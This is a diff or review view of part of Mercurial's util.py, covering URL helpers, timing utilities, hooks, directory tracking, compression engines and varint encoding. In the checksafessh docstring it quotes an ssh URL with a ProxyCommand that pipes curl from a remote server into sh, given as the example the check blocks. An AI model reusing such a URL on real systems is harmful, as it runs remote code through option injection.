3317 user, passwd = self.user, self.passwd
3318 try:
3318 try:
3319 self.user, self.passwd = None, None
3319 self.user, self.passwd = None, None
3320 s = bytes(self)
3320 s = bytes(self)
3321 finally:
3321 finally:
3322 self.user, self.passwd = user, passwd
3322 self.user, self.passwd = user, passwd
3323 if not self.user:
3323 if not self.user:
3324 return (s, None)
3324 return (s, None)
3325 # authinfo[1] is passed to urllib2 password manager, and its
3325 # authinfo[1] is passed to urllib2 password manager, and its
3326 # URIs must not contain credentials. The host is passed in the
3326 # URIs must not contain credentials. The host is passed in the
3327 # URIs list because Python < 2.4.3 uses only that to search for
3327 # URIs list because Python < 2.4.3 uses only that to search for
3328 # a password.
3328 # a password.
3329 return (s, (None, (s, self.host),
3329 return (s, (None, (s, self.host),
3330 self.user, self.passwd or ''))
3330 self.user, self.passwd or ''))
3331
3331
3332 def isabs(self):
3332 def isabs(self):
3333 if self.scheme and self.scheme != 'file':
3333 if self.scheme and self.scheme != 'file':
3334 return True # remote URL
3334 return True # remote URL
3335 if hasdriveletter(self.path):
3335 if hasdriveletter(self.path):
3336 return True # absolute for our purposes - can't be joined()
3336 return True # absolute for our purposes - can't be joined()
3337 if self.path.startswith(br'\\'):
3337 if self.path.startswith(br'\\'):
3338 return True # Windows UNC path
3338 return True # Windows UNC path
3339 if self.path.startswith('/'):
3339 if self.path.startswith('/'):
3340 return True # POSIX-style
3340 return True # POSIX-style
3341 return False
3341 return False
3342
3342
3343 def localpath(self):
3343 def localpath(self):
3344 if self.scheme == 'file' or self.scheme == 'bundle':
3344 if self.scheme == 'file' or self.scheme == 'bundle':
3345 path = self.path or '/'
3345 path = self.path or '/'
3346 # For Windows, we need to promote hosts containing drive
3346 # For Windows, we need to promote hosts containing drive
3347 # letters to paths with drive letters.
3347 # letters to paths with drive letters.
3348 if hasdriveletter(self._hostport):
3348 if hasdriveletter(self._hostport):
3349 path = self._hostport + '/' + self.path
3349 path = self._hostport + '/' + self.path
3350 elif (self.host is not None and self.path
3350 elif (self.host is not None and self.path
3351 and not hasdriveletter(path)):
3351 and not hasdriveletter(path)):
3352 path = '/' + path
3352 path = '/' + path
3353 return path
3353 return path
3354 return self._origpath
3354 return self._origpath
3355
3355
3356 def islocal(self):
3356 def islocal(self):
3357 '''whether localpath will return something that posixfile can open'''
3357 '''whether localpath will return something that posixfile can open'''
3358 return (not self.scheme or self.scheme == 'file'
3358 return (not self.scheme or self.scheme == 'file'
3359 or self.scheme == 'bundle')
3359 or self.scheme == 'bundle')
3360
3360
def hasscheme(path):
    """Return True if *path* carries an explicit URL scheme."""
    parsed = url(path)
    return bool(parsed.scheme)
3363
3363
def hasdriveletter(path):
    """Return truthy when *path* starts with a Windows drive letter ('X:').

    An empty/falsy *path* is returned unchanged (falsy), matching the
    short-circuit behavior of the original boolean chain.
    """
    if not path:
        return path
    return path[0:1].isalpha() and path[1:2] == ':'
3366
3366
def urllocalpath(path):
    """Return the local filesystem path for *path*, treating any '?' or '#'
    as literal path characters rather than query/fragment separators."""
    u = url(path, parsequery=False, parsefragment=False)
    return u.localpath()
3369
3369
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    # Unquote first so percent-encoded '-' can't sneak past the check.
    decoded = urlreq.unquote(path)
    if decoded.startswith(('ssh://-', 'svn+ssh://-')):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (decoded,))
3384
3384
def hidepassword(u):
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = '***'
    return bytes(parsed)
3391
3391
def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    # Return bytes for consistency with hidepassword() above; str(u) would
    # yield a unicode string on Python 3 in this bytes-oriented API.
    return bytes(u)
3397
3397
# Pretty-printer for durations expressed in seconds.  Each entry is a
# (threshold, divisor, format) triple as consumed by unitcountfn() (defined
# earlier in this file); ordering goes from coarse units (seconds) down to
# nanoseconds so the first matching scale wins.
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )
3413
3413
# Current indentation (in spaces) of nested @timed reports; stored in a
# one-element list so the wrapper closure below can mutate it.
_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        begin = timer()
        step = 2
        _timenesting[0] += step
        try:
            return func(*args, **kwargs)
        finally:
            # Report even when func raises; dedent before printing so the
            # innermost call appears most indented.
            duration = timer() - begin
            _timenesting[0] -= step
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(duration)))
    return wrapper
3440
3440
# Suffix -> byte multiplier, checked in order; single letters first, then
# the two-letter spellings, then plain 'b'.
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    spec = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if spec.endswith(suffix):
                return int(float(spec[:-len(suffix)]) * multiplier)
        # No recognized suffix: the whole string must be an integer.
        return int(spec)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3462
3462
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # list of (source, hookfn) pairs; kept unsorted until invocation
        self._hooks = []

    def add(self, source, hook):
        """Register *hook* under the name *source*."""
        self._hooks.append((source, hook))

    def __call__(self, *args):
        """Invoke every hook with *args*; return their results in order."""
        # Sort by source name so invocation order is deterministic.
        self._hooks.sort(key=lambda entry: entry[0])
        return [hookfn(*args) for _source, hookfn in self._hooks]
3480
3480
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not be used in production code but very convenient while developing.
    '''
    # Drop the 'skip' innermost frames plus this call itself, then keep the
    # last 'depth' entries (depth=0 slices [-0:], i.e. keeps everything).
    # pycompat.sysbytes keeps the output bytes-typed on Python 3.
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        # Width of the widest file:line field, used for column alignment.
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)
3503
3503
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    if otherf:
        # Flush the other stream first so interleaved output stays ordered.
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    # skip + 1 hides this helper's own frame from the report.
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()
3518
3518
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        # directory name -> number of tracked entries underneath it
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            # dirstate-style map: entries whose state char equals 'skip'
            # (e.g. removed files) are not counted.
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        """Account for one entry at *path* in every ancestor directory."""
        dirs = self._dirs
        for base in finddirs(path):
            count = dirs.get(base)
            if count is not None:
                # Once an ancestor is present, all shallower ancestors are
                # too, and finddirs yields deepest-first — so stop here.
                dirs[base] = count + 1
                return
            dirs[base] = 1

    def delpath(self, path):
        """Remove one entry at *path* from every ancestor directory."""
        dirs = self._dirs
        for base in finddirs(path):
            remaining = dirs[base] - 1
            if remaining > 0:
                dirs[base] = remaining
                return
            # Last entry under this directory: drop it and keep walking up.
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
3554
3554
# Prefer the C implementation from the parsers extension module when it is
# available; it shadows the pure-Python class defined above.
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3557
3557
def finddirs(path):
    """Yield each ancestor directory of *path*, deepest first.

    ``finddirs('a/b/c')`` yields ``'a/b'`` then ``'a'``; a path containing
    no slash yields nothing.
    """
    sep = path.rfind('/')
    while sep != -1:
        yield path[:sep]
        sep = path.rfind('/', 0, sep)
3563
3563
# compression code

# Role identifiers used when querying wire-protocol compression support.
SERVERROLE = 'server'
CLIENTROLE = 'client'

# Describes one engine's wire-protocol support: its wire identifier plus
# its relative priority when this process acts as server or as client.
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))
3572
3572
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        # Engine name to compressionengine instance.
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}
3593
3593
    def __getitem__(self, key):
        # Look up a registered engine by name; raises KeyError if missing.
        return self._engines[key]
3596
3596
    def __contains__(self, key):
        # True if an engine with this name has been registered.
        return key in self._engines
3599
3599
3600 def __iter__(self):
3600 def __iter__(self):
3601 return iter(self._engines.keys())
3601 return iter(self._engines.keys())
3602
3602
    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.

        Raises error.Abort when the engine's name, bundle name/type, wire
        identifier, or revlog header collides with an existing registration.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        # Record the engine's bundle support, if declared.
        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        # Record the engine's wire-protocol support, if declared.
        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        # Record the engine's revlog header, if declared.
        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        # All validation passed: commit the registration.
        self._engines[name] = engine
3653
3653
3654 @property
3654 @property
3655 def supportedbundlenames(self):
3655 def supportedbundlenames(self):
3656 return set(self._bundlenames.keys())
3656 return set(self._bundlenames.keys())
3657
3657
3658 @property
3658 @property
3659 def supportedbundletypes(self):
3659 def supportedbundletypes(self):
3660 return set(self._bundletypes.keys())
3660 return set(self._bundletypes.keys())
3661
3661
3662 def forbundlename(self, bundlename):
3662 def forbundlename(self, bundlename):
3663 """Obtain a compression engine registered to a bundle name.
3663 """Obtain a compression engine registered to a bundle name.
3664
3664
3665 Will raise KeyError if the bundle type isn't registered.
3665 Will raise KeyError if the bundle type isn't registered.
3666
3666
3667 Will abort if the engine is known but not available.
3667 Will abort if the engine is known but not available.
3668 """
3668 """
3669 engine = self._engines[self._bundlenames[bundlename]]
3669 engine = self._engines[self._bundlenames[bundlename]]
3670 if not engine.available():
3670 if not engine.available():
3671 raise error.Abort(_('compression engine %s could not be loaded') %
3671 raise error.Abort(_('compression engine %s could not be loaded') %
3672 engine.name())
3672 engine.name())
3673 return engine
3673 return engine
3674
3674
3675 def forbundletype(self, bundletype):
3675 def forbundletype(self, bundletype):
3676 """Obtain a compression engine registered to a bundle type.
3676 """Obtain a compression engine registered to a bundle type.
3677
3677
3678 Will raise KeyError if the bundle type isn't registered.
3678 Will raise KeyError if the bundle type isn't registered.
3679
3679
3680 Will abort if the engine is known but not available.
3680 Will abort if the engine is known but not available.
3681 """
3681 """
3682 engine = self._engines[self._bundletypes[bundletype]]
3682 engine = self._engines[self._bundletypes[bundletype]]
3683 if not engine.available():
3683 if not engine.available():
3684 raise error.Abort(_('compression engine %s could not be loaded') %
3684 raise error.Abort(_('compression engine %s could not be loaded') %
3685 engine.name())
3685 engine.name())
3686 return engine
3686 return engine
3687
3687
    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        # Which priority field of compewireprotosupport applies to this role.
        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))
3712
3712
3713 def forwiretype(self, wiretype):
3713 def forwiretype(self, wiretype):
3714 engine = self._engines[self._wiretypes[wiretype]]
3714 engine = self._engines[self._wiretypes[wiretype]]
3715 if not engine.available():
3715 if not engine.available():
3716 raise error.Abort(_('compression engine %s could not be loaded') %
3716 raise error.Abort(_('compression engine %s could not be loaded') %
3717 engine.name())
3717 engine.name())
3718 return engine
3718 return engine
3719
3719
3720 def forrevlogheader(self, header):
3720 def forrevlogheader(self, header):
3721 """Obtain a compression engine registered to a revlog header.
3721 """Obtain a compression engine registered to a revlog header.
3722
3722
3723 Will raise KeyError if the revlog header value isn't registered.
3723 Will raise KeyError if the revlog header value isn't registered.
3724 """
3724 """
3725 return self._engines[self._revlogheaders[header]]
3725 return self._engines[self._revlogheaders[header]]
3726
3726
# Singleton registry of all known compression engines, shared module-wide.
compengines = compressormanager()
3728
3728
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and `decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3845
3845
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
3932
3932
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())
3975
3975
class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        # First element None: never exposed as a user-facing bundle spec.
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())
3996
3996
class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())
4031
4031
class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
4160
4160
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        # Engines with no bundle support, or whose bundle name is hidden
        # (first element None), are excluded from help output.
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items
4192
4192
# Expose the bundle-type docstrings so the i18n machinery can extract them.
i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace
4197
4197
def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    # Plain "name~tag" is taken; append an increasing counter until a free
    # name is found. itertools.count never terminates, so this always returns.
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn
4220
4220
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    data = stream.read(n)
    if len(data) >= n:
        return data
    # the underlying stream ran dry before delivering the requested bytes
    raise error.Abort(_("stream ended unexpectedly"
                        " (got %d bytes, expected %d)")
                      % (len(data), n))
4229
4229
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    # Emit 7-bit groups, least significant first; every group except the
    # final one carries the continuation bit (0x80).
    groups = []
    remaining = value
    while True:
        lowbits = remaining & 0x7f
        remaining >>= 7
        if not remaining:
            groups.append(pycompat.bytechr(lowbits))
            break
        groups.append(pycompat.bytechr(0x80 | lowbits))
    return ''.join(groups)
4266
4266
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        # pull one byte at a time; an empty read means the stream ended
        # before the varint terminated
        s = fh.read(1)
        if not s:
            raise error.Abort(_("stream ended unexpectedly"
                                " (got %d bytes, expected %d)")
                              % (len(s), 1))
        byte = ord(s)
        # accumulate the low 7 bits; the high bit signals continuation
        result |= (byte & 0x7f) << shift
        if not (byte & 0x80):
            return result
        shift += 7
General Comments 0
You need to be logged in to leave comments. Login now